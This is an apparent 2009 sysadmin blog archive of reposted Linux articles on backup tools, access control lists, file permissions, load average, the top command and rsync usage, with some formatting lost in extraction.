Saturday, August 22, 2009

Ten essential backup tools for Linux

SkyHi @ Saturday, August 22, 2009
A reliable backup tool is an essential — and finding one with the features you want need not cost a fortune, says Jack Wallen.

Whether you work in IT or you are a computer power user at home, you need a backup tool. It should allow you to make scheduled, one-time, local and remote backups, along with other tasks.

Plenty of proprietary solutions exist. Some are minimal and cost-effective, while others are feature-rich and expensive.

The open-source community also has plenty to offer in terms of backup software. Here are 10 excellent utilities for the Linux operating system — in fact, some of these are cross-platform and will back up Linux, Windows and Mac.

1. Fwbackups
Fwbackups is by far the easiest of all the Linux backup options to use. It is cross-platform, has a user-friendly interface and can do single or recurring scheduled backups.

The fwbackups tool allows you to do backups either locally or remotely in tar, tar.gz, tar.bZ, or rsync format. You can back up an entire computer or a single file.

Unlike many backup utilities, fwbackups is easy to install because it will probably be found in your distribution's repository. Both backing up and restoring are incredibly easy — as is scheduling a remote, recurring scheduled backup. You can also perform incremental or differential backups to speed up the process.

2. Bacula
Bacula is a powerful backup utility and one of the few Linux open-source backup tools to be truly enterprise-ready. But with that comes a level of complexity you might not find in other backup software. Unlike many other utilities, Bacula contains a number of components:

1. Director: The application that supervises all of Bacula
2. Console: This is how you communicate with the Bacula Director
3. File: This is the application that is installed on the machine to be backed up
4. Storage: This application performs the reading/writing to your storage space
5. Catalog: This application is responsible for the databases used
6. Monitorp: Allows the administrator to keep track of the status of the various Bacula tools

Bacula is not the easiest backup utility to configure and use, but it is one of the most powerful. So if you are looking for power and are not concerned about putting in the time to familiarise yourself with configuration, Bacula is the tool for you.

3. Rsync
Rsync is one of the most widely used Linux backup utilities. With rsync, you can do flexible incremental backups, either locally or remotely.

Read this
Comment: Top 10 pratfalls for novice Linux admins

As a new Linux admin, it's easy to trip up over commonly made mistakes, says Jack Wallen...

Read more +

Rsync can update whole directory trees and file systems; preserve links, ownerships, permissions and privileges; use rsh, ssh or direct sockets for connection; and support anonymous connections.

Rsync is a command-line tool, although front-ends are available, such as Grsync. But the front-ends negate the flexibility of having a simple command-line backup tool.

One of the biggest pluses of using a command-line tool is that you can create simple scripts to use, in conjunction with cron, to create automated backups. For this, rsync is perfect.

4. Mondo Rescue
Mondo Rescue is one of those tools you around for disaster recovery, because one of its strengths is backing up an entire installation. Another strength of Mondo Rescue is that it can back up to nearly any medium, including CD, DVD, tape, NFS and hard disk.

Mondo Rescue also supports LVM 1/2, RAID, ext2, ext3, ext4, JFS, XFS, ReiserFS and VFAT. If your file system is not listed, there is a call on the Mondo website to email the developers for a file system request and they will make it work.

Mondo Rescue is used by large companies, such as Lockheed Martin, so you know it is reliable.

5. Simple Backup Solution
Simple Backup Solution is primarily targeted at desktop backup. It can back up files and directories, and allows regular expressions to be used for exclusion purposes.

Because Simple Backup Solution uses compressed archives, it is not the best option for backing up large...

...amounts of pre-compressed data, such as multimedia files. One of the beauties of this tool is that it includes predefined backup solutions that can be used to back up directories, such as /var/, /etc/, /usr/local.

SBS is not limited to predefined backups. You can also perform custom, manual and scheduled backups, and the interface is user-friendly.

One of the downsides of SBS is that it does not include a restore feature, such as the one found in fwbackups.

6. Amanda
Amanda allows an administrator to set up a single backup server and back up multiple hosts to it. It is robust, reliable and flexible. Amanda uses native Linux dump or tar to facilitate the backup process.

One useful feature is that Amanda can use Samba to back up Windows clients to the same Amanda server. It is important to note that with Amanda, there are separate applications for server and client.

For the server, only Amanda is needed. For the client, the Amanda-client application must be installed.

7. Arkeia
Arkeia is one of the big boys in the backup industry. If you are looking for enterprise-level backup-restore tools — and even replication server solutions — and do not mind paying a premium, Arkeia is a strong candidate.

If you are wondering about price, the Arkeia starter pack costs $1,300 (£800), which should indicate the seriousness of this package.

Although Arkeia says it has small to medium-sized versions, it is best suited for larger business and enterprise-level needs.

8. Back In Time
Back In Time allows you to take snapshots of predefined directories and can do so to a schedule. This tool has an outstanding interface and integrates well with Gnome and KDE.

Back In Time does a great job of creating dated snapshots that will serve as backups. However, it does not use any compression for the backups, nor does it include an automated restore tool. It is a desktop-only tool.

9. Box Backup
Box Backup is unusual in that it is not only fully automated, but can also use encryption to secure backups.

Read this
Comment: Ten extensions that add Firefox power

Firefox may be good, but there are numerous extensions to make even better, says Jack Wallen...

Read more +

It uses both a client and a server daemon, as well as a restore utility. The utility uses SSL certificates to authenticate clients, so connections are secure.

Although Box Backup is a command-line utility, it is simple to configure and deploy. Data directories are configured, the daemon scans those directories and if new data is found, it is uploaded to the server.

There are three components to install — the bbstored backup server daemon, the bbackupd client daemon and the bbackupquery backup query and restore tool. Box Backup is available for Linux, OpenBSD, Windows, NetBSD, FreeBSD, Darwin and Solaris.

10. Kbackup
Kbackup is a simple utility that backs up locally to any media that can be written to. It is designed to be a backup device that any user can take advantage of. T

o that end, it is simple and does not have a long list of features. Apart from being able to back up files and directories, its only other feature allows users to save backup profiles that can be opened and backed up quickly.

Kbackup uses the tar format to restore backups, which is as simple as using ARK as a graphical user interface for unpacking the backup files.

Backup of choice?
If we have overlooked your favourite Linux backup, tell us what it is and how you deployed it.




Reference: http://resources.zdnet.co.uk/articles/comment/0,1000002985,39718160,00.htm

Friday, August 21, 2009

To use Clonezilla to save a disk, the source diks must me unmounted

SkyHi @ Friday, August 21, 2009
http://www.google.ca/#hl=en&source=hp&q=clonezilla+to+use+clonezilla+to+save+or+clone+a+disk%2C+the+source+disk+must+be+unmounted&btnG=Google+Search&meta=&aq=f&fp=79108af2917f27da


http://drbl.sourceforge.net/faq/fine-print.php?path=./2_System/23_Missing_OS.faq

Linux getfacl setfacl Using Access Control Lists

SkyHi @ Friday, August 21, 2009
This sample chapter explains common Linux partitioning options so you can determine which is best for you. It also discusses how to use access control lists to limit access to filesystems as well as how to enforce disk usage limits known as quotas
Using Access Control Lists

On an ext3 filesystem, read, write, and execute permissions can be set for the owner of the file, the group associated with the file, and for everyone else who has access to the filesystem. These files are visible with the ls -l command. Refer to Chapter 4, “Understanding Linux Concepts,” for information on reading standard file permissions.

In most cases, these standard file permissions along with restricted access to mounting filesystems are all that an administrator needs to grant file privileges to users and to prevent unauthorized users from accessing important files. However, when these basic file permissions are not enough, access control lists, or ACLs, can be used on an ext3 filesystem.

ACLs expand the basic read, write, and execute permissions to more categories of users and groups. In addition to permissions for the owner and group for the file, ACLs allow for permissions to be set for any user, any user group, and the group of all users not in the group for the user. An effective rights mask, which is explained later, can also be set to restrict permissions.

To use ACLs on the filesystem, the acl package must be installed. If it is not already installed, install it via Red Hat Network as discussed in Chapter 3.
Enabling ACLs

To use ACLs, they must be enabled when an ext3 filesystem is mounted. This is most commonly enabled as an option in /etc/fstab. For example:

LABEL=/share /share ext3 acl 1 2

If the filesystem can be unmounted and remounted while the system is still running, modify /etc/fstab for the filesystem, unmount it, and remount it so the changes to /etc/fstab take effect. Otherwise, the system must be rebooted to enable ACLs on the desired filesystems.

If you are mounting the filesystem via the mount command instead, use the -o acl option when mounting:

mount -t ext3 -o acl

Setting and Modifying ACLs

There are four categories of ACLs per file: for an individual user, for a user group, via the effective rights mask, and for users not in the user group associated with the file. To view the existing ACLs for a file, execute the following:

getfacl

If ACLs are enabled, the output should look similar to Listing 7.10.
Listing 7.10. Viewing ACLs

# file: testfile
# owner: tfox
# group: tfox
user::rwx
group::r-x
mask::rwx
other::r-x

To set or modify existing ACLs, use the following syntax:

setfacl -m

Other useful options include --test to show the results of the command but not change the ACL and -R to apply the rules recursively.

Replace with one or more space-separated file or directory names. Rules can be set for four different rule types. Replace with one or more of the following, and replace in these rules with one or more of r, w, and x (which stand for read, write, and execute):

* For an individual user:

u::

* For a specific user group:

g::

* For users not in the user group associated with the file:

o:

* Via the effective rights mask:

m:

The first three rule types (individual user, user group, or users not in the user group for the file) are pretty self-explanatory. They allow you to give read, write, or execute permissions to users in these three categories. A user or group ID may be used, or the actual username or group name.

CAUTION

If the actual username or group name is used to set an ACL, the UID or GID for it are still used to store the ACL. If the UID or GID for a user or group name changes, the ACLs are not changed to reflect the new UID or GID.

But, what is the effective rights mask? The effective rights mask restricts the ACL permission set allowed for users or groups other than the owner of the file. The standard file permissions are not affected by the mask, just the permissions granted by using ACLs. In other words, if the permission (read, write, or execute) is not in the effective rights mask, it appears in the ACLs retrieved with the getfacl command, but the permission is ignored. Listing 7.11 shows an example of this where the effective rights mask is set to read-only, meaning the read-write permissions for user brent and the group associated with the file are effectively read-only. Notice the comment to the right of the ACLs affected by the effective rights mask.
Listing 7.11. Effective Rights Mask

# file: testfile
# owner: tammy
# group: tammy
user::rw-
user:brent:rw- #effective:r--
group::rw- #effective:r--
mask::r--
other::rw-

The effective rights mask must be set after the ACL rule types. When an ACL for an individual user (other than the owner of the file) or a user group is added, the effective rights mask is automatically recalculated as the union of all the permissions for all users other than the owner and all groups including the group associated with the file. So, to make sure the effective rights mask is not modified after setting it, set it after all other ACL permissions.

If the ACL for one of these rule types already exists for the file or directory, the existing ACL for the rule type is replaced, not added to. For example, if user 605 already has read and execute permissions to the file, after the u:605:w rule is implemented, user 605 only has write permissions.
Setting Default ACLs

Two types of ACLs can be used: access ACLs, and default ACLs. So far, this chapter has only discussed access ACLs. Access ACLs are set for individual files and directories. Directories, and directories only, can also have default ACLs, which are optional. If a directory has a default ACL set for it, any file or directory created in the directory with default ACLs will inherit the default ACLs. If a file is created, the access ACLs are set to what the default ACLs are for the parent directory. If a directory is created, the access ACLs are set to what the default ACLs are for the parent directory and the default ACLs for the new directory are set to the same default ACLs as the parent directory.

To set the ACL as a default ACL, prepend d: to the rule such as d:g:500:rwx to set a default ACL of read, write, and execute for user group 500. If any default ACL exists for the directory, the default ACLs must include a user, group, and other ACL at a minimum as shown in Listing 7.12.
Listing 7.12. Default ACLs

# file: testdir
# owner: tfox
# group: tfox
user::rwx
group::r-x
mask::rwx
other::r-x
default:user::rwx
default:group::r-x
default:other::r--

If a default ACL is set for an individual user other than the file owner or for a user group other than the group associated with the file, a default effective rights mask must also exist. If one is not implicitly set, it is automatically calculated as with access ACLs. The same rules apply for the default ACL effective rights mask: It is recalculated after an ACL for any user other than the owner is set or if an ACL for any group including the group associated with the file is set, meaning it should be set last to ensure it is not changed after being set.
Removing ACLs

The setfacl -x command can be used to remove ACL permissions by ACL rule type. The for this command use the same syntax as the setfacl -m command except that the field is omitted because all rules for the rule type are removed.

It is also possible to remove all ACLs for a file or directory with:

setfacl --remove-all

To remove all default ACLs for a directory:

setfacl --remove-default

Preserving ACLs

The NFS and Samba file sharing clients in Red Hat Enterprise Linux recognize and use any ACLs associated with the files shared on the server. If your NFS or Samba clients are not running Red Hat Enterprise Linux, be sure to ask the operating system vendor about ACL support or test your client configuration for support.

The mv command to move files preserves the ACLs associated with the file. If it can’t for some reason, a warning is displayed. However, the cp command to copy files does not preserve ACLs.

The tar and dump commands also do not preserve the ACLs associated with files or directories and should not be used to back up or archive files with ACLs. To back up or archive files while preserving ACLs use the star utility. For example, if you are moving a large number of files with ACLs, create an archive of all the files using star, copy the star archive file to the new system or directory, and unarchive the files. Be sure to use getfacl to verify that the ACLs are still associated with the files. The star RPM package must be installed to use the utility. Refer to Chapter 3 for details on package installation via Red Hat Network. The star command is similar to tar. Refer to its man page with the man star command for details.





Reference:http://www.informit.com/articles/article.aspx?p=725218&seqNum=5

Linux Permission

SkyHi @ Friday, August 21, 2009
[root@web html]# find silver.com -type f -exec chmod 644 {} \;

root@web html]# find silver.com -type d -exec chmod 2755 {} \;


[root@web home]# ls -tlrh
total 520K
-rw-r--r-- 1 user1 group1 1.2K Jun 9 12:42 README
-rw-r--r-- 1 user1 group1 2.3K Jun 9 12:42 index.php
-rw-r--r-- 1 user1 group1 202K Jul 23 12:43 logo.psd
-rw-r--r-- 1 user1 group1 281K Jul 23 14:37 top_nav.psd
drwxr-sr-x 5 user1 group1 4.0K Jul 28 11:51 vendors
drwxr-sr-x 6 user1 group1 4.0K Jul 28 11:52 cake
drwxr-sr-x+ 12 user1 group1 4.0K Aug 11 16:25 app
[root@web home]# ls -l
total 520
drwxr-sr-x+ 12 user1 group1 4096 Aug 11 16:25 app
drwxr-sr-x 6 user1 group1 4096 Jul 28 11:52 cake
-rw-r--r-- 1 user1 group1 2311 Jun 9 12:42 index.php
-rw-r--r-- 1 user1 group1 206458 Jul 23 12:43 logo.psd
-rw-r--r-- 1 user1 group1 1158 Jun 9 12:42 README
-rw-r--r-- 1 user1 group1 286913 Jul 23 14:37 top_nav.psd
drwxr-sr-x 5 user1 group1 4096 Jul 28 11:51 vendors
[root@web home]# getfacl app
# file: app
# owner: user1
# group: group1
user::rwx
group::r-x
other::r-x
default:user::rwx
default:group::rwx
default:other::rwx

[root@web home]# getfacl cake
# file: cake
# owner: user1
# group: group1
user::rwx
group::r-x
other::r-x

//-R recursive
[root@web home]# setfacl --remove-default app/

[root@web home]# getfacl app/
# file: app
# owner: user1
# group: group1
user::rwx
group::r-x
other::r-x

About Linux Processor load average

SkyHi @ Friday, August 21, 2009
About Linux Processor loadavgs

Processor load averages are those numbers you get when you use the uptime command. Three loadavgs are returned. Each is the result of performing the computation with a different half life.

On a normal users linux box, the load average is usually something pretty low, such as 0.03. This means that on average there are 0.03 processes ready to run at any one time.

The loadavg can be compared to a "percentage of CPU used" metric as found, for example, in the Windows NT Task Manager. However, whilst a CPU percentage measure can only go up to 100% (or 1.00 on the loadavg scale), the loadavg can go arbitrarily high. The reason for this is that the loadavg measures the average number of processes that are ready to run, rather than the average number that are actually running. Obviously, you can only have a maximum of one running process per processor at any given instant.

On an asynchronous server (one that is not interacting directly with users; for example, a mail server or upstream news server), it might be desirable to have the loadavg at 1.00 (call it perfectly loaded). This means that no processor capacity is wasted (or more specifically, no money has been wasted buying a fast processor that is not being used), but the system is not overloaded. It is possible to use loadavgs to determine if this is the case, whereas a simple "percentage of CPU used" metric can not distinguish between an overloaded and perfectly loaded server. (actually this is not true - processes can be ready to run even if they can't immediately use the CPU, I think)
Calculating loadavgs

Loadavg values use an exponentially-weighted average, with increasingly smaller weights over a (theoretically) infinite period of time extending from the present into the past. More recent measurements have larger weight than previous readings.

The theoretical calculation of the load average is as follows:

We have the following values:

1. A (possibly infinite) series of readings labelled x n where n starts at 0 for the most recent reading and increases into the past. Readings before the start of the "universe" (in the case of a unix processor loadavg, before the machine was booted) should be set to 0.
2. A decay factor, d, satisfying 0 < d < 1

Then, we can define the loadavg at time t as follows:

L t = Σ n = 0 ∞ 1 d n ( 1 - d ) x n + t

For practical calculation, note that the present loadavg can be computed iteratively from the present reading x 1 , the decay factor and the loadavg of the previous period as follows:

L t = ( 1 - 1 d ) x 0 + 1 d L t - 1

The initial value of L should be set to 0.

This permits the loadavg to be computing very efficiently on an on-going basis with only a small, fixed number of data.

Decay factors have a length of time associated with them, called the half life. This is the period of time it takes for the loadavg to halve in value if all future input values are 0. No matter what the particular value of the loadavg is at the start of the decay, the time taken for it to half, and hence the length of the half life, is constant.

Some approximate values of half-life are given below:
Decay constants and their associated half-lives. Decay constant d Half life
0.5 1
0.25 <1
0.75 2.5
0.1 <<1
0.9 7
0.95 14
0.965 20

Anyone who has studied A-level physics should find the concept of half-lives familiar.
How the linux kernel actually computes the loadavg

As mentioned at the start of this document, linux provides three load averages, with different decay constants and half lifes. The relevant values are listed in the following table:
Standard decay values in sched.h Decay constant Decay time (not half life) Kernel constant
1 min (12 periods) 1884
5 min (60 periods) 2014
15 min (180 periods) 2037

The code is defined in sched.c and sched.h.

Loadavgs are stored in the three element array avenrun[] as fixed point numbers, with 11 bits for the fractional part. That means, to convert an integer i into this representation, write i<<11 and to extract the integer part from a number in this fractional form, write i>>11.

Readings are taken every 5 seconds, by calling the count_active_tasks() function. This counts the number of tasks that are running, swapping or uninterruptible.


Reference: http://www.hawaga.org.uk/ben/tech/loadavg.html





http://en.wikipedia.org/wiki/Unix_load_average
In UNIX computing, the system load is a measure of the amount of work that a computer system performs. The load average represents the average system load over a period of time. It conventionally appears in the form of three numbers which represent the system load during the last one, five, and fifteen -minute periods.
Contents
[hide]

* 1 Unix-style load calculation
* 2 Load average is not CPU utilization
* 3 CPU load vs CPU utilization
* 4 See also
* 5 External links
* 6 References

[edit] Unix-style load calculation

All Unix and Unix-like systems generate a metric of three "load average" numbers in the kernel. Users can easily query the current result from a Unix shell by running the uptime command:

$ uptime
09:53:15 up 119 days, 19:08, 10 users, load average: 3.73 7.98 0.50

The w and top commands show the same three load average numbers, as do a range of graphical user interface utilities.

An idle computer has a load number of 0 and each process using or waiting for CPU adds to the load number by 1. Most UNIX systems count only processes in the running (on CPU) or runnable (waiting for CPU) states. However, Linux also includes processes in uninterruptible sleep states (usually waiting for disk activity), which can lead to markedly different results if many processes remain blocked in I/O due to a busy or stalled I/O system. This, for example, includes processes blocking due to an NFS server failure or to slow media (e.g., USB 1.x storage devices). Such circumstances can result in an elevated load average, which does not reflect an actual increase in CPU use (but still gives an idea on how long users have to wait).

Systems calculate the load average as the exponentially damped/weighted moving average of the load number. The three values of load average refer to the past one, five, and fifteen minutes of system operation.

For single-CPU systems that are CPU-bound, one can think of load average as a percentage of system utilization during the respective time period. For systems with multiple CPUs, one must divide the number by the number of processors in order to get a comparable percentage.

For example, one can interpret a load average of "1.73 0.50 7.98" on a single-CPU system as:

* during the last minute, the CPU was overloaded by 73% (1 CPU with 1.73 runnable processes, so that 0.73 processes had to wait for a turn)
* during the last 5 minutes, the CPU was underloaded 50% (no processes had to wait for a turn)
* during the last 15 minutes, the CPU was overloaded 698% (1 CPU with 7.98 runnable processes, so that 6.98 processes had to wait for a turn)

This means that this CPU could have handled all of the work scheduled for the last minute if it were 1.73 times as fast, or if there were two (1.73 rounded up) times as many CPUs, but that over the last five minutes it was twice as fast as necessary to prevent runnable processes from waiting their turn.

In a system with four CPUs, a load average of 3.73 would indicate that there were, on average, 3.73 processes ready to run, and each one could be scheduled into a CPU.

On modern UNIX systems, the treatment of threading with respect to load averages varies. Some systems treat threads as processes for the purposes of load average calculation: each thread waiting to run will add 1 to the load. However, other systems, especially systems implementing so-called M:N threading, use different strategies, such as counting the process exactly once for the purpose of load (regardless of the number of threads), or counting only threads currently exposed by the user-thread scheduler to the kernel, which may depend on the level of concurrency set on the process.

Many systems generate the load average by sampling the state of the scheduler periodically, rather than recalculating on all pertinent scheduler events. They adopt this approach for performance reasons, as scheduler events occur frequently, and scheduler efficiency impacts significantly on system efficiency. As a result, sampling error can lead to load averages inaccurately representing actual system behavior. This can pose a particular problem for programs that wake up at a fixed interval that aligns with the load-average sampling, in which case a process may be under- or over-represented in the load average numbers.

[edit] Load average is not CPU utilization

Even though the statements in the previous section might suggest that load average is related to CPU utilization because the section relates CPU to load average, load average does not measure CPU utilization of processes. One reason it does not do this is because load averages computations of processes are in a wrong order to relate to trend information of CPU utilization. In other words, the calculations and numbers directly produced by load averages do not compute numbers in an order from more CPU intensive to less CPU intensive or vice-a-versa, nor do they give computations of numbers that would give another way that would result in direct information about CPU utilization. In summary, the functions of load average give numbers based on load queue of processes. [1] The next section uses the same reference to suggest that load average is not very important or vital to system performance information until or unless the a system's CPU is heavily loaded to around 100%. Then, at levels close to 100%, load average could be very important or significant to determinacy of system performance; however, this would be because average load numbers give direct information about process queue length not CPU utilization -- which is something they do not give direct information about.

[edit] CPU load vs CPU utilization

A comparative study of different load indices carried out by Domenico et al.[1] reported that CPU load information based upon the CPU queue length does much better in load balancing compared to CPU utilization. The reason CPU queue length did better is probably because, when a host is heavily loaded, its CPU utilization is likely to be close to 100% and it is unable to reflect the exact load level of the utilization. In contrast, CPU queue lengths can directly reflect the amount of load on a CPU. As an example, two systems, one with 3 and the other with 6 processes in the queue, will probably have utilizations close to 100% although they obviously differ.

Reference: http://en.wikipedia.org/wiki/Unix_load_average

Linux TOP command

SkyHi @ Friday, August 21, 2009
The linux top command is the Command Line equivalent to Task Manager in windows.
Question / Scenario:

How do I determine CPU and Memory utilization, based on running processes.
Answer / Solution:

Use the TOP command in linux.
TOP

Top command provides a real-time look at what is happening with your system. Top produces so much output that a new user may get over whelmed with all thats presented and what it means.

Lets take a look at TOP one line at a time. The server has been flooded with http requests to create some load on the server.

top output:

top - 22:09:08 up 14 min, 1 user, load average: 0.21, 0.23, 0.30
Tasks: 81 total, 1 running, 80 sleeping, 0 stopped, 0 zombie
Cpu(s): 9.5%us, 31.2%sy, 0.0%ni, 27.0%id, 7.6%wa, 1.0%hi, 23.7%si, 0.0%st
Mem: 255592k total, 167568k used, 88024k free, 25068k buffers
Swap: 524280k total, 0k used, 524280k free, 85724k cached

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
3166 apache 15 0 29444 6112 1524 S 6.6 2.4 0:00.79 httpd
3161 apache 15 0 29444 6112 1524 S 5.9 2.4 0:00.79 httpd
3164 apache 15 0 29444 6112 1524 S 5.9 2.4 0:00.75 httpd
3169 apache 15 0 29444 6112 1524 S 5.9 2.4 0:00.74 httpd
3163 apache 15 0 29444 6112 1524 S 5.6 2.4 0:00.76 httpd
3165 apache 15 0 29444 6112 1524 S 5.6 2.4 0:00.77 httpd
3167 apache 15 0 29444 6112 1524 S 5.3 2.4 0:00.73 httpd
3162 apache 15 0 29444 6112 1524 S 5.0 2.4 0:00.77 httpd
3407 root 16 0 2188 1012 816 R 1.7 0.4 0:00.51 top
240 root 15 0 0 0 0 S 0.3 0.0 0:00.08 pdflush
501 root 10 -5 0 0 0 S 0.3 0.0 0:01.20 kjournald
2794 root 18 0 12720 1268 560 S 0.3 0.5 0:00.73 pcscd
1 root 15 0 2060 636 544 S 0.0 0.2 0:03.81 init
2 root RT -5 0 0 0 S 0.0 0.0 0:00.00 migration/0
3 root 34 19 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
4 root RT -5 0 0 0 S 0.0 0.0 0:00.00 watchdog/0
5 root 10 -5 0 0 0 S 0.0 0.0 0:00.07 events/0

The first line in top:

top - 22:09:08 up 14 min, 1 user, load average: 0.21, 0.23, 0.30

“22:09:08″ is the current time; “up 14 min” shows how long the system has been up for; “1 user” how many users are logged in; “load average: 0.21, 0.23, 0.30″ the load average of the system (1minute, 5 minutes, 15 minutes).

Load average is an extensive topic and to understand its inner workings can be daunting. The simplest of definitions states that load average is the cpu utilization over a period of time. A load average of 1 means your cpu is being fully utilized and processes are not having to wait to use a CPU. A load average above 1 indicates that processes need to wait and your system will be less responsive. If your load average is consistently above 3 and your system is running slow you may want to upgrade to more CPU’s or a faster CPU.

The second line in top:

Tasks: 82 total, 1 running, 81 sleeping, 0 stopped, 0 zombie

Shows the number of processes and their current state.

The third lin in top:

Cpu(s): 9.5%us, 31.2%sy, 0.0%ni, 27.0%id, 7.6%wa, 1.0%hi, 23.7%si, 0.0%st

Shows CPU utilization details. “9.5%us” user processes are using 9.5%; “31.2%sy” system processes are using 31.2%; “27.0%id” percentage of available cpu; “7.6%wa” time CPU is waiting for IO.

When first analyzing the Cpu(s) line in top look at the %id to see how much cpu is available. If %id is low then focus on %us, %sy, and %wa to determine what is using the CPU.

The fourth and fifth lines in top:

Mem: 255592k total, 167568k used, 88024k free, 25068k buffers
Swap: 524280k total, 0k used, 524280k free, 85724k cached

Describes the memory usage. These numbers can be misleading. “255592k total” is total memory in the system; “167568K used” is the part of the RAM that currently contains information; “88024k free” is the part of RAM that contains no information; “25068K buffers and 85724k cached” is the buffered and cached data for IO.

So what is the actual amount of free RAM available for programs to use ?

The answer is: free + (buffers + cached)

88024k + (25068k + 85724k) = 198816k

How much RAM is being used by progams ?

The answer is: used - (buffers + cached)

167568k - (25068k + 85724k) = 56776k

The processes information:

Top will display the process using the most CPU usage in descending order. Lets describe each column that represents a process.

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
3166 apache 15 0 29444 6112 1524 S 6.6 2.4 0:00.79 httpd

PID - process ID of the process

USER - User who is running the process

PR - The priority of the process

NI - Nice value of the process (higher value indicates lower priority)

VIRT - The total amount of virtual memory used

RES - Resident task size

SHR - Amount of shared memory used

S - State of the task. Values are S (sleeping), D (uninterruptible sleep), R (running), Z (zombies), or T (stopped or traced)

%CPU - Percentage of CPU used

%MEM - Percentage of Memory used

TIME+ - Total CPU time used

COMMAND - Command issued
Interacting with TOP

Now that we are able to understand the output from TOP lets learn how to change the way the output is displayed.

Just press the following key while running top and the output will be sorted in real time.

M - Sort by memory usage

P - Sort by CPU usage

T - Sort by cumulative time

z - Color display

k - Kill a process

q - quit

If we want to kill the process with PID 3161, then press “k” and a prompt will ask you for the PID number, and enter 3161.
Command Line Parameters with TOP

You can control what top displays by issuing parameters when you run top.

- d - Controls the delay between refreshes

- p - Specify the process by PID that you want to monitor

-n - Update the display this number of times and then exit

If we want to only monitor the http process with a PID of 3166

$ top -p 3166

If we want to change the delay between refreshes to 5 seconds

$ top -d 5

Referece: http://www.kernelhardware.org/linux-top-command/

rsync test tutorial

SkyHi @ Friday, August 21, 2009
###initialize this script on the destination host
#rsync -u -v -r --bwlimit=2000 root@backupserver:/backup2/ns1.home.com /mnt/sda/ns1.home.com

##Archive 2 directories(html and test1) to /mnt/sda
#cd /mnt/sda
#tar cvf /mnt/sda/backup2009.rar /var/www/html /var/www/test1


Test 2: LOCAL MACHINE SYNC

[root@jud sda]# mkdir -p home/ftp

[root@jud ftp]# pwd
/mnt/sda/home/ftp


###source
root@jud vista_temp]# touch derek.test
[root@jud vista_temp]# ll
total 0
-rw-r--r-- 1 root root 0 Jan 29 11:23 derek.test


###vista_temp will be created in destination /mnt/sda/home/ftp/vista_temp
[root@jud sda]# cat rsyncvista_temp.sh
rsync --bwlimit=200 -v -z -r -L -t /home/ftp/vista_temp /mnt/sda/home/ftp >> /mnt/sda/vista_temp.log


###destination
[root@jud ftp]# cd vista_temp/
[root@jud vista_temp]# ll
total 0
-rw-r--r-- 1 root root 0 Jan 29 11:19 derek.test



Test 3: add --delete //delete extraneous files from dest dirs

[root@jud vista_temp]# touch derek.new
[root@jud vista_temp]# rm derek.test
rm: remove regular empty file `derek.test'? y
[root@jud vista_temp]# ll
total 0
-rw-r--r-- 1 root root 0 Jan 29 11:19 derek.new



[root@jud sda]# cat rsyncvista_tempdelete.sh
rsync --bwlimit=200 -v -z -r -L -t --delete /home/ftp/vista_temp /mnt/sda/home/ftp >> /mnt/sda/vista_temp.log


###Source intact
[root@jud vista_temp]# pwd
/home/ftp/vista_temp
[root@jud vista_temp]# ll
total 0
-rw-r--r-- 1 root root 0 Jan 29 11:19 derek.new
-rw-r--r-- 1 root root 0 Jan 29 11:23 derek.test


###destination updated
[root@jud vista_temp]# pwd
/mnt/sda/home/ftp/vista_temp
[root@jud vista_temp]# ll
total 0
-rw-r--r-- 1 root root 0 Jan 29 11:19 derek.new


##check log
[root@jud sda]# cat vista_temp.log
building file list ... done
building file list ... done
vista_temp/
vista_temp/derek.test

sent 112 bytes received 48 bytes 320.00 bytes/sec
total size is 0 speedup is 0.00
building file list ... done
deleting vista_temp/derek.test
vista_temp/
vista_temp/derek.new

sent 115 bytes received 48 bytes 326.00 bytes/sec
total size is 0 speedup is 0.00









# man rsync

EXAMPLES
Here are some examples of how I use rsync.

To backup my wifeâs home directory, which consists of large MS Word files and mail
folders, I use a cron job that runs

rsync -Cavz . arvidsjaur:backup

each night over a PPP connection to a duplicate directory on my machine "arvidsjaur".

To synchronize my samba source trees I use the following Makefile targets:

get:
rsync -avuzb --exclude â*~â samba:samba/ .
put:
rsync -Cavuzb . samba:samba/
sync: get put

this allows me to sync with a CVS directory at the other end of the connection. I
then do CVS operations on the remote machine, which saves a lot of time as the remote
CVS protocol isnât very efficient.

I mirror a directory between my "old" and "new" ftp sites with the command:

rsync -az -e ssh --delete ~ftp/pub/samba nimbus:"~ftp/pub/tridge"

This is launched from cron every few hours.


OPTIONS SUMMARY
Here is a short summary of the options available in rsync. Please refer to the
detailed description below for a complete description.

-v, --verbose increase verbosity
-q, --quiet suppress non-error messages
--no-motd suppress daemon-mode MOTD (see caveat)
-c, --checksum skip based on checksum, not mod-time & size
-a, --archive archive mode; equals -rlptgoD (no -H,-A,-X)
--no-OPTION turn off an implied OPTION (e.g. --no-D)
-r, --recursive recurse into directories
-R, --relative use relative path names
--no-implied-dirs donât send implied dirs with --relative
-b, --backup make backups (see --suffix & --backup-dir)
--backup-dir=DIR make backups into hierarchy based in DIR
--suffix=SUFFIX backup suffix (default ~ w/o --backup-dir)
-u, --update skip files that are newer on the receiver
--inplace update destination files in-place
--append append data onto shorter files
-d, --dirs transfer directories without recursing
-l, --links copy symlinks as symlinks
-L, --copy-links transform symlink into referent file/dir
--copy-unsafe-links only "unsafe" symlinks are transformed
--safe-links ignore symlinks that point outside the tree
-k, --copy-dirlinks transform symlink to dir into referent dir
-K, --keep-dirlinks treat symlinked dir on receiver as dir
-H, --hard-links preserve hard links
-p, --perms preserve permissions
-E, --executability preserve executability
--chmod=CHMOD affect file and/or directory permissions
-A, --acls preserve ACLs (implies -p) [non-standard]
-X, --xattrs preserve extended attrs (implies -p) [n.s.]
-o, --owner preserve owner (super-user only)
-g, --group preserve group
--devices preserve device files (super-user only)
--specials preserve special files
-D same as --devices --specials
-t, --times preserve times
-O, --omit-dir-times omit directories when preserving times
--super receiver attempts super-user activities
-S, --sparse handle sparse files efficiently
-n, --dry-run show what would have been transferred
-W, --whole-file copy files whole (without rsync algorithm)
-x, --one-file-system donât cross filesystem boundaries
-B, --block-size=SIZE force a fixed checksum block-size
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
--existing skip creating new files on receiver
--ignore-existing skip updating files that exist on receiver
--remove-source-files sender removes synchronized files (non-dir)
--del an alias for --delete-during
--delete delete extraneous files from dest dirs
--delete-before receiver deletes before transfer (default)
--delete-during receiver deletes during xfer, not before
--delete-after receiver deletes after transfer, not before
--delete-excluded also delete excluded files from dest dirs
